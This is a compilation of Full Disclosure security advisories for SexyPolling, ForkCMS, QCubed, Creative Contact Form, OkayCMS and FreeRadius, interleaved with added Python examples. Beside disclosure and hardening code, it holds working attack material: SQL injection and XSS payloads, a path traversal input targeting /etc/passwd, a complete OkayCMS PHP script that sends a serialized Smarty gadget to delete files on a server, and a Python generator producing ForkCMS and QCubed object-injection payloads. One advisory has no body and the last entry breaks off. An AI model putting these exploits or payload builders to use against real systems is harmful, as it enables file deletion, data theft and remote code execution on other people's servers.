[FD] [AIT-SA-20220208-01] SexyPolling SQL Injection
SexyPolling SQL Injection
=========================

| Identifier: | AIT-SA-20220208-01 |
| Target: | Sexy Polling (Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

Summary
=======

[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling)

In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST parameters to vote.php.

Vulnerability Description
=========================

In the file vote.php, the POST parameters min_date and max_date are neither validated nor escaped. An attacker can use these parameters to inject SQL. In lines 74 and 75 of *site/vote.php* the parameters are assigned without being checked:

```
$min_date_sended = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sended = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```

They are later concatenated unfiltered into the WHERE clause:

```
$query_toal = "SELECT COUNT(sv.`id_answer`) total_count, MAX(sv.`date`) max_date, MIN(sv.`date`) min_date
    FROM `#__sexy_votes` sv
    JOIN `#__sexy_answers` sa ON sa.id_poll = '$polling_id' AND sa.published = '1'
    WHERE sv.`id_answer` = sa.id";
//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
    $query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```

Proof Of Concept
================

To check a system for this vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.
HTTP request:

```
POST /components/com_sexypolling/vote.php HTTP/1.1
Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1_id[]=3=digits_date=2021-12-07'_date=2021-12-14_name=-_code=-_name=-_name=-_period=24=1
```

The HTTP response contains a MySQL error:

```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json

Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 00:00:00 AND sv.`date` <= 2021-12-14 23:59:59 at line 12
```

Vulnerable Versions
===================

All versions below version 2.1.8

Tested Versions
===============

Sexy Polling (Joomla Extension) 2.1.7

Impact
======

An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation
==========

Sexy Polling 2.1.8 fixed this issue.

Vendor Contact Timeline
=======================

| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The contact form of the maintainer of sexy_polling was broken and no other contact was published. The Joomla Security Strike Team let us know that they would investigate, but they did not send any updates about the progress.*

Advisory URL
============

[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)

___

Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
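The date-filter bug above, rebuilt on SQLite as an added example (this is not code from the advisory or from Sexy Polling). `build_query_vulnerable` concatenates min_date/max_date exactly the way site/vote.php does, `probe` performs the advisory's apostrophe check, and `count_votes_hardened` shows the fix: validate the shape of the dates and bind them as parameters so the database never parses user data as SQL. The tables, rows and the helper names are constructed for the demo; the real extension uses Joomla's `#__` table prefix and MariaDB, not SQLite.

```python
"""Sexy Polling vote.php date filter: vulnerable concatenation vs. bound parameters."""
import re
import sqlite3

DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")  # shape check only; the DB does the rest


def setup_db() -> sqlite3.Connection:
    """Constructed stand-in for #__sexy_votes / #__sexy_answers (poll 1 has answers 3 and 4)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE sexy_answers (id INTEGER PRIMARY KEY, id_poll INTEGER, published TEXT);
        CREATE TABLE sexy_votes   (id INTEGER PRIMARY KEY, id_answer INTEGER, date TEXT);
        INSERT INTO sexy_answers VALUES (3, 1, '1'), (4, 1, '1'), (5, 2, '1');
        INSERT INTO sexy_votes VALUES
          (1, 3, '2021-12-07 10:00:00'),
          (2, 4, '2021-12-10 10:00:00'),
          (3, 3, '2021-12-20 10:00:00'),
          (4, 5, '2021-12-08 10:00:00');
    """)
    return con


def build_query_vulnerable(polling_id, min_date, max_date) -> str:
    """String interpolation as in vote.php lines 74/75 and the WHERE clause (the bug)."""
    min_date_sended = min_date + " 00:00:00" if min_date is not None else ""
    max_date_sended = max_date + " 23:59:59" if max_date is not None else ""
    query = ("SELECT COUNT(sv.id_answer) total_count, MAX(sv.date) max_date, MIN(sv.date) min_date "
             "FROM sexy_votes sv JOIN sexy_answers sa "
             f"ON sa.id_poll = '{polling_id}' AND sa.published = '1' "
             "WHERE sv.id_answer = sa.id")
    if min_date_sended != "" and max_date_sended != "":
        query += f" AND sv.date >= '{min_date_sended}' AND sv.date <= '{max_date_sended}' "
    return query


def count_votes_vulnerable(con, polling_id, min_date, max_date):
    return con.execute(build_query_vulnerable(polling_id, min_date, max_date)).fetchone()


def probe(con, polling_id, min_date, max_date) -> bool:
    """The advisory's check: a lone apostrophe in min_date makes the statement fail to parse."""
    try:
        count_votes_vulnerable(con, polling_id, min_date, max_date)
        return False
    except sqlite3.OperationalError:
        return True


def count_votes_hardened(con, polling_id, min_date, max_date):
    """Validate, then bind: the date strings travel as parameters, never as SQL text."""
    if not isinstance(polling_id, int):
        raise ValueError("polling_id must be an integer")
    for d in (min_date, max_date):
        if d and not DATE_RE.match(d):
            raise ValueError(f"bad date: {d!r}")
    query = ("SELECT COUNT(sv.id_answer), MAX(sv.date), MIN(sv.date) "
             "FROM sexy_votes sv JOIN sexy_answers sa "
             "ON sa.id_poll = ? AND sa.published = '1' WHERE sv.id_answer = sa.id")
    params = [polling_id]
    if min_date and max_date:
        query += " AND sv.date >= ? AND sv.date <= ?"
        params += [min_date + " 00:00:00", max_date + " 23:59:59"]
    return con.execute(query, params).fetchone()


def hardened_rejects(con, polling_id, min_date, max_date) -> bool:
    try:
        count_votes_hardened(con, polling_id, min_date, max_date)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    con = setup_db()
    print("filtered count:", count_votes_vulnerable(con, 1, "2021-12-07", "2021-12-14"))
    print("apostrophe probe hits:", probe(con, 1, "2021-12-07'", "2021-12-14"))
    # A comment sequence drops the rest of the WHERE clause and widens the result set.
    print("injected count:", count_votes_vulnerable(con, 1, "2021-12-07' OR 1=1 -- ", "2021-12-14"))
    print("hardened rejects probe:", hardened_rejects(con, 1, "2021-12-07'", "2021-12-14"))
```

The probe is the same signal the advisory's PoC relies on: a 500 with a database error where a normal request returns JSON. The regex in the hardened version only enforces the `YYYY-MM-DD` shape; the parameter binding is what removes the injection, so keep both even if the date check looks redundant.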
[FD] [AIT-SA-20210215-04] CVE-2020-24036: ForkCMS PHP Object Injection
ForkCMS PHP Object Injection
============================

| Identifier: | AIT-SA-20210215-04 |
| Target: | ForkCMS |
| Vendor: | ForkCMS |
| Version: | all versions below version 5.8.3 |
| CVE: | CVE-2020-24036 |
| Accessibility: | Remote |
| Severity: | Medium |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

SUMMARY
=======

[ForkCMS is an open source CMS written in PHP.](https://www.fork-cms.com/)

VULNERABILITY DESCRIPTION
=========================

PHP object injection in the Ajax endpoint of the backend in ForkCMS below version 5.8.3 allows an authenticated remote user to execute malicious code. The Ajax callbacks for the backend use unserialize() without restrictions or any validation. An authenticated user could abuse this to inject malicious PHP objects, which could lead to remote code execution (excerpt from the backend Ajax action):

```
// request parameters, all attacker-controlled
$url = $this->getRequest()->request->get('url', '');
$className = $this->getRequest()->request->get('className', '');
$methodName = $this->getRequest()->request->get('methodName', '');
$parameters = $this->getRequest()->request->get('parameters', '');

// cleanup values
$parameters = unserialize($parameters); // ← VULNERABLE CODE

// fetch generated meta url
$url = urldecode($this->get('fork.repository.meta')->generateUrl($url, $className, $methodName, $parameters));

// output
$this->output(Response::HTTP_OK, $url);
```

PROOF OF CONCEPT
================

In order to exploit this vulnerability, an attacker has to be authenticated with the least privileges. We tested this exploit with "Dashboard" permissions. For demonstration purposes we created a proof-of-concept exploit that deletes files and directories from the web server. With more effort an attacker might also find a payload for executing a webshell. There are many gadgets available in the vendor directory for potential payloads.
The object-injection code for generating a payload might look as follows:

```
'O:27:"Swift_KeyCache_DiskKeyCache":1:{s:4:"keys";a:1:{s:%d:"%s";a:1:{s:%d:"%s";s:9:"something";}}}' % (len(filepath),filepath,len(deletefile),deletefile)
```

VULNERABLE VERSIONS
===================

All versions including 5.8.1 are affected.

TESTED VERSIONS
===============

ForkCMS 5.8.1 (with Debian 10 and PHP 7.3.14-1)

IMPACT
======

An authenticated user with minimal privileges could execute malicious code.

MITIGATION
==========

Fork 5.8.3 fixed this issue.

VENDOR CONTACT TIMELINE
=======================

| 2020-05-01 | Contacting the vendor |
| 2020-06-08 | Vendor replied |
| 2020-07-07 | Vendor released an updated version |
| 2021-02-15 | Public disclosure |

ADVISORY URL
============

[https://www.ait.ac.at/ait-sa-20210215-04-poi-forkcms](https://www.ait.ac.at/ait-sa-20210215-04-poi-forkcms)
[FD] [AIT-SA-20210215-03] CVE-2020-24912: QCubed Cross-Site-Scripting
QCubed Cross-Site-Scripting
===========================

| Identifier: | AIT-SA-20210215-03 |
| Target: | QCubed Framework |
| Vendor: | QCubed |
| Version: | all versions including 3.1.1 |
| CVE: | CVE-2020-24912 |
| Accessibility: | Remote |
| Severity: | High |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

SUMMARY
=======

QCubed is a PHP Model-View-Controller Rapid Application Development framework. (https://github.com/qcubed/qcubed)

VULNERABILITY DESCRIPTION
=========================

A reflected cross-site scripting (XSS) vulnerability in QCubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows unauthenticated attackers to steal sessions of authenticated users.

PROOF OF CONCEPT
================

The XSS occurs because the SQL output in profile.php is not sanitized properly. Since we are able to tamper with that output using a SQL injection (CVE-2020-24913), we can easily output a common XSS string. The query is wrapped in PostgreSQL dollar quoting, so the payload needs no apostrophes at all. We use the following payload (unencoded):

```
a:1:{i:0;a:3:{s:12:"objBacktrace";a:1:{s:4:"args";a:1:{i:0;s:3:"PWN";}}s:8:"strQuery";s:112:"select version(); select convert_from(decode($$PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K$$,$$base64$$),$$utf-8$$)";s:11:"dblTimeInfo";s:1:"1";}}
```

The base64 string PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K decodes to:

```
<script>alert('xss')</script>
```

VULNERABLE VERSIONS
===================

All versions including 3.1.1 are affected.

TESTED VERSIONS
===============

QCubed 3.1.1

IMPACT
======

An unauthenticated attacker could steal sessions of authenticated users.

MITIGATION
==========

A patch was delivered by QCubed that allows disabling the profile functionality (https://github.com/qcubed/qcubed/pull/1320/files).
VENDOR CONTACT TIMELINE
=======================

| 2020-04-19 | Contacting the vendor |
| 2020-04-19 | Vendor replied |
| 2020-05-01 | Vendor released a patch at GitHub |
| 2021-02-15 | Public disclosure |

ADVISORY URL
============

[https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed](https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed)
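Both the ForkCMS payload (the `Swift_KeyCache_DiskKeyCache` format string in AIT-SA-20210215-04) and the QCubed strProfileData array above are hand-written PHP `serialize()` output, where every `s:N:` and `O:N:` length must match exactly or `unserialize()` silently fails. The following is an added example, not code from either advisory or project: a minimal serializer that produces both payloads byte-for-byte and uses UTF-8 byte lengths, which the `%d`/`len()` format string gets wrong for non-ASCII paths because PHP counts bytes, not characters. `PHPObject`, `php_serialize` and the two payload builders are names chosen here; the sample paths are constructed.

```python
"""Build PHP object-injection payloads with correct lengths."""
import base64


class PHPObject:
    """A PHP object to serialize: class name plus its public properties, in order."""

    def __init__(self, cls: str, props: dict):
        self.cls = cls
        self.props = props


def php_serialize(value) -> str:
    """Subset of PHP serialize(): null, bool, int, str, list/dict (arrays) and PHPObject."""
    if value is None:
        return "N;"
    if isinstance(value, bool):            # before int: bool is a subclass of int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # PHP's length is the byte length, so a path like "/tmp/ä" must be measured as UTF-8.
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PHPObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return f'O:{len(value.cls.encode("utf-8"))}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type: {type(value).__name__}")


def forkcms_delete_payload(filepath: str, deletefile: str) -> str:
    """Same structure as the ForkCMS advisory's format string (Swift_KeyCache_DiskKeyCache gadget)."""
    return php_serialize(PHPObject("Swift_KeyCache_DiskKeyCache",
                                   {"keys": {filepath: {deletefile: "something"}}}))


def qcubed_profile_payload(query: str, marker: str = "PWN") -> str:
    """strProfileData as posted to QCubed's profile.php: one entry with an attacker-chosen strQuery."""
    return php_serialize([{
        "objBacktrace": {"args": [marker]},
        "strQuery": query,
        "dblTimeInfo": "1",
    }])


# The advisory's strQuery: dollar-quoted so the value needs no apostrophes.
XSS_QUERY = ("select version(); select convert_from(decode("
             "$$PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K$$,$$base64$$),$$utf-8$$)")


def decoded_xss_script() -> str:
    """What the dollar-quoted base64 in XSS_QUERY unpacks to on the server."""
    return base64.b64decode("PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K").decode()


if __name__ == "__main__":
    print(forkcms_delete_payload("/var/www/fork/src", "parameters.yml"))
    print(qcubed_profile_payload(XSS_QUERY))
    print(repr(decoded_xss_script()))
```

Feeding `XSS_QUERY` to `qcubed_profile_payload` reproduces the advisory's payload exactly, including the `s:112:` length; swapping in a path with an umlaut shows why the byte count matters.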
[FD] [AIT-SA-20210215-02] CVE-2020-24913: QCubed SQL Injection
QCubed SQL Injection
====================

| Identifier: | AIT-SA-20210215-02 |
| Target: | QCubed Framework |
| Vendor: | QCubed |
| Version: | all versions including 3.1.1 |
| CVE: | CVE-2020-24913 |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

SUMMARY
=======

QCubed is a PHP Model-View-Controller Rapid Application Development framework. (https://github.com/qcubed/qcubed)

VULNERABILITY DESCRIPTION
=========================

A SQL injection vulnerability in QCubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request.

The strQuery entry of the serialized array posted to profile.php reaches the database unfiltered. It is used by PrintExplainStatement, which simply concatenates "EXPLAIN " with the parameter:

```
public function ExplainStatement($sql) {
    return $this->Query("EXPLAIN " . $sql);
}
```

This query is executed without any filtering. We were able to write proof-of-concept exploits for MySQL and PostgreSQL. With MySQL we were not able to use a stacked-queries payload and had to exploit the vulnerability with a time-based approach.

VULNERABLE VERSIONS
===================

All versions including 3.1.1 are affected.

TESTED VERSIONS
===============

QCubed 3.1.1

IMPACT
======

An unauthenticated attacker could access the database remotely. In worst-case scenarios an attacker might be able to execute code on the remote machine.

MITIGATION
==========

A patch was delivered by QCubed that allows disabling the profile functionality (https://github.com/qcubed/qcubed/pull/1320/files).
VENDOR CONTACT TIMELINE
=======================

| 2020-04-19 | Contacting the vendor |
| 2020-04-19 | Vendor replied |
| 2020-05-01 | Vendor released a patch at GitHub |
| 2021-02-15 | Public disclosure |

ADVISORY URL
============

[https://www.ait.ac.at/ait-sa-20210215-02-unauthenticated-sql-injection-qcubed](https://www.ait.ac.at/ait-sa-20210215-02-unauthenticated-sql-injection-qcubed)
[FD] [AIT-SA-20210215-01] CVE-2020-24914: QCubed PHP Object Injection
QCubed PHP Object Injection
===========================

| Identifier: | AIT-SA-20210215-01 |
| Target: | QCubed Framework |
| Vendor: | QCubed |
| Version: | all versions including 3.1.1 |
| CVE: | CVE-2020-24914 |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

SUMMARY
=======

QCubed is a PHP Model-View-Controller Rapid Application Development framework. (https://github.com/qcubed/qcubed)

VULNERABILITY DESCRIPTION
=========================

A PHP object injection bug in profile.php in QCubed (all versions including 3.1.1) unserializes the untrusted data of the POST variable "strProfileData" and allows an unauthenticated attacker to execute code via a crafted POST request.

qcubed/assets/php/profile.php:

ADVISORY URL
============

[https://www.ait.ac.at/ait-sa-20210215-01-unauthenticated-remote-code-execution-qcubed](https://www.ait.ac.at/ait-sa-20210215-01-unauthenticated-remote-code-execution-qcubed)
[FD] [AIT-SA-20200301-01] CVE-2020-9364: Directory Traversal in Creative Contact Form
# Directory Traversal in Creative Contact Form

## Overview

* Identifier: AIT-SA-20200301-01
* Target: Creative Contact Form (for Joomla)
* Vendor: Creative Solutions
* Version: 4.6.2 (before Dec 03 2019)
* CVE: CVE-2020-9364
* Accessibility: Remote
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary

[Creative Contact Form](https://creative-solutions.net/) is a responsive jQuery contact form for the Joomla content management system.

## Vulnerability Description

A directory traversal vulnerability resides inside the mailer component of the Creative Contact Form for Joomla. An attacker could exploit this vulnerability to receive arbitrary files from the server via e-mail. The vulnerable code is located in "helpers/mailer.php" at line 290:

```
if(isset($_POST['creativecontactform_upload'])) {
    if(is_array($_POST['creativecontactform_upload'])) {
        foreach($_POST['creativecontactform_upload'] as $file) {
            // echo $file.'--';
            $file_path = JPATH_BASE . '/components/com_creativecontactform/views/creativeupload/files/'.$file;
            $attach_files[] = $file_path;
        }
    }
}
```

If an attacker puts "../../../../../../../../etc/passwd" into $_POST['creativecontactform_upload'] and enables "Send me a copy", the contact form sends him the content of /etc/passwd via e-mail.
_Note: this vulnerability might not be exploitable in the free version of Creative Contact Form since it does not allow "Send copy to sender"._

## Vulnerable Versions

Creative Contact Form Personal/Professional/Business 4.6.2 (before Dec 3 2019)

## Impact

An unauthenticated attacker could receive any file from the server.

## Mitigation

Update to the current version.

## References:

* https://nvd.nist.gov/vuln/detail/CVE-2020-9364

## Vendor Contact Timeline

* `2019-12-02` Contacting the vendor
* `2019-12-02` Vendor published a fixed version
* `2020-03-01` Public disclosure

## Advisory URL

[https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form](https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form)
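The path handling in helpers/mailer.php, rebuilt as an added example (this is not code from the advisory or from Creative Contact Form): `attach_path_vulnerable` is the plain concatenation from line 290, `attach_path_hardened` treats the posted value as a single file name and then proves the resolved path still lies under the upload directory. The demo stages a fake Joomla tree in a temporary directory; `configuration.php` there is a constructed stand-in for any sensitive file, and the function names are chosen here.

```python
"""Creative Contact Form attachment path: traversal vs. contained resolution."""
import os
import tempfile

UPLOAD_DIR_REL = "components/com_creativecontactform/views/creativeupload/files"


def attach_path_vulnerable(jpath_base: str, file: str) -> str:
    """Equivalent of JPATH_BASE . '/.../files/' . $file: no check at all."""
    return jpath_base + "/" + UPLOAD_DIR_REL + "/" + file


def attach_path_hardened(jpath_base: str, file: str) -> str:
    """Accept one path component, resolve it, and require containment in the upload dir."""
    upload_dir = os.path.realpath(os.path.join(jpath_base, UPLOAD_DIR_REL))
    # An upload name is a single component: anything with a separator or '..' is rejected up front.
    if file in ("", ".", "..") or file != os.path.basename(file):
        raise ValueError(f"invalid upload name: {file!r}")
    resolved = os.path.realpath(os.path.join(upload_dir, file))
    # Containment check after realpath(): also catches a symlink planted inside the upload dir.
    if os.path.commonpath([upload_dir, resolved]) != upload_dir:
        raise ValueError(f"path escapes upload directory: {file!r}")
    return resolved


def hardened_rejects(jpath_base: str, file: str) -> bool:
    try:
        attach_path_hardened(jpath_base, file)
        return False
    except ValueError:
        return True


def demo() -> dict:
    """Stage a fake site tree and run both builders against a legitimate and a traversal name."""
    with tempfile.TemporaryDirectory() as base:
        upload_dir = os.path.join(base, UPLOAD_DIR_REL)
        os.makedirs(upload_dir)
        open(os.path.join(upload_dir, "cv.pdf"), "w").close()      # a legitimate upload
        secret = os.path.join(base, "configuration.php")           # constructed sensitive file
        open(secret, "w").close()
        # 'files' is five levels below the base; more '../' than needed simply stays at '/'.
        traversal = "../../../../../configuration.php"
        vuln = attach_path_vulnerable(base, traversal)
        return {
            "vulnerable_path_exists": os.path.isfile(vuln),
            "vulnerable_resolves_to_secret": os.path.realpath(vuln) == os.path.realpath(secret),
            "hardened_accepts_upload": attach_path_hardened(base, "cv.pdf")
                                       == os.path.realpath(os.path.join(upload_dir, "cv.pdf")),
            "hardened_rejects_traversal": hardened_rejects(base, traversal),
            "hardened_rejects_absolute": hardened_rejects(base, "/etc/passwd"),
        }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The basename rule alone would be enough for the advisory's `../` payload; the `realpath` plus `commonpath` check is what also covers a symlink that an earlier upload managed to place inside the directory.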
[FD] [AIT-SA-20191129-01] CVE-2019-16885: Unauthenticated remote code execution in OkayCMS
# Unauthenticated remote code execution in OkayCMS

## Overview

* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Remote
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary

[OkayCMS is a simple and functional content management system for an online store.](https://okay-cms.com)

## Vulnerability Description

An unauthenticated attacker can upload a webshell by injecting a malicious PHP object via a crafted cookie. This can happen in two places: in "view/ProductsView.php" via the cookie "price_filter", and in "api/Comparison.php" via the cookie "comparison". Both cookies pass untrusted values straight to unserialize().

The following code shows the vulnerability in "api/Comparison.php":

```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```
$price_filter = unserialize($_COOKIE['price_filter']);
```

## Proof of Concept

The following code uses an object of the Smarty component to delete arbitrary files from the web host. The classes below are local stand-ins that only carry the property names and the `__destruct()` to `releaseLock()` to `unlink()` chain of the real Smarty classes, so that serialize() yields a payload the server-side classes accept:

```
<?php
// Usage check reconstructed: the original source only preserved the exit(1).
if ($argc < 3) {
    print "Usage: " . $argv[0] . " <url> <file>\n";
    exit(1);
}

$url = $argv[1];
$file = $argv[2];

// Gadget chain: Smarty_Internal_Template::__destruct() -> releaseLock() -> @unlink($cached->lock_id)
class Smarty_Internal_CacheResource_File {
    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
        $cached->is_locked = false;
        @unlink($cached->lock_id);
    }
}

class Smarty_Template_Cached {
    public $handler = null;
    public $is_locked = true;
    public $lock_id = "";

    public function __construct() {
        $this->lock_id = $GLOBALS['file'];   // path that gets unlinked on the target
        $this->handler = new Smarty_Internal_CacheResource_File;
    }
}

class Smarty {
    public $cache_locking = true;
}

class Smarty_Internal_Template {
    public $smarty = null;
    public $cached = null;

    public function __construct() {
        $this->smarty = new Smarty;
        $this->cached = new Smarty_Template_Cached;
    }

    public function __destruct() {
        if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
            $this->cached->handler->releaseLock($this->smarty, $this->cached);
        }
    }
}

$obj = new Smarty_Internal_Template();
$serialized = serialize($obj);
// Note: when $obj is destroyed at script exit the same __destruct() runs locally and
// tries to unlink $file on this machine too (silently, because of the @).

$headers = [
    'Accept-Language: en-US,en;q=0.5',
    "Referer: $url/en/catalog/myagkie-igrushki",
    'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_HTTPHEADER => $headers,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
    CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if (curl_error($curl)) {
    print curl_error($curl);
}
curl_close($curl);
print $resp;
?>
```

## Notes

Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.

## Vulnerable Versions

All versions of the "Lite" branch including 2.3.4. Pro versions prior to 3.0.2 might have been affected too.

## Tested Versions

OkayCMS-Lite 2.3.4

## Impact

An unauthenticated attacker could upload a webshell to the server and execute commands remotely.

## Mitigation

At the time of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.

## References:

* https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-11-29` Public disclosure

## Advisory URL

[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)
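A cookie that legitimately carries a serialized array never contains an `O:` object token, so an object token in `price_filter` or `comparison` is the one reliable sign that the bug above is being probed. The following is an added example, not code from the advisory or from OkayCMS: it URL-decodes each cookie in a Cookie header and lists the classes a PHP `unserialize()` would instantiate, checking that each declared length really matches the class name so look-alike text in a normal value is not reported. The two sample cookies are constructed here; `GADGET` is the serialized form of the Smarty chain used in the proof of concept above, with a constructed target path.

```python
"""Flag PHP object-injection attempts in Cookie headers."""
import re
from urllib.parse import quote, unquote_plus

# O:<len>:"<class>":<props>:{  is the token PHP's unserialize() reads to instantiate an object.
OBJ_RE = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')


def php_classes(serialized: str) -> list:
    """Class names in a serialized blob whose declared length matches the name (UTF-8 bytes)."""
    return [name for length, name, _ in OBJ_RE.findall(serialized)
            if int(length) == len(name.encode("utf-8"))]


def parse_cookie_header(header: str) -> dict:
    """Split 'a=1; b=2' into a dict, URL-decoding values the way PHP fills $_COOKIE."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = unquote_plus(value)
    return cookies


def find_object_injection(cookie_header: str) -> dict:
    """Map every cookie that carries at least one serialized object to its class names."""
    hits = {}
    for name, value in parse_cookie_header(cookie_header).items():
        classes = php_classes(value)
        if classes:
            hits[name] = classes
    return hits


# Constructed samples. BENIGN is what a real price filter looks like: a plain array.
BENIGN_COOKIE = "PHPSESSID=abc123; price_filter=" + quote('a:2:{s:3:"min";i:10;s:3:"max";i:20;}')

# The proof-of-concept chain as serialize() emits it (target path chosen for the demo).
GADGET = ('O:24:"Smarty_Internal_Template":2:{'
          's:6:"smarty";O:6:"Smarty":1:{s:13:"cache_locking";b:1;}'
          's:6:"cached";O:22:"Smarty_Template_Cached":3:{'
          's:7:"handler";O:34:"Smarty_Internal_CacheResource_File":0:{}'
          's:9:"is_locked";b:1;s:7:"lock_id";s:14:"/var/www/x.php";}}')
MALICIOUS_COOKIE = "PHPSESSID=abc123; price_filter=" + quote(GADGET)


if __name__ == "__main__":
    print("benign   :", find_object_injection(BENIGN_COOKIE))
    print("malicious:", find_object_injection(MALICIOUS_COOKIE))
```

Run over access logs or a WAF tap, the class list is what tells you which gadget chain is being tried; here it spells out the Smarty chain from the proof of concept in the order the destructor will walk it.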
[FD] [AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius
# Privilege Escalation via Logrotate in FreeRadius

## Overview

* Identifier: AIT-SA-20191112-01
* Target: FreeRadius
* Vendor: FreeRadius
* Version: all versions including 3.0.19
* Fixed in Version: no upstream fix (see Mitigation)
* CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143
* Accessibility: Local
* Severity: Low
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary

[FreeRadius is a modular Open-Source RADIUS suite.](https://freeradius.org/)

## Vulnerability Description

The log directory "radacct" is owned by user "radiusd". User "radiusd" can elevate privileges to "root" because of an unsafe interaction with logrotate.

User "radiusd" owns the log directory /var/log/radius/radacct:

```
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```

Log files are rotated once a day (or at any other configured frequency) by logrotate running as root. The configuration does not use the "su" directive:

```
/var/log/radius/radacct/*/detail {
    monthly
    rotate 4
    nocreate
    missingok
    compress
}
```

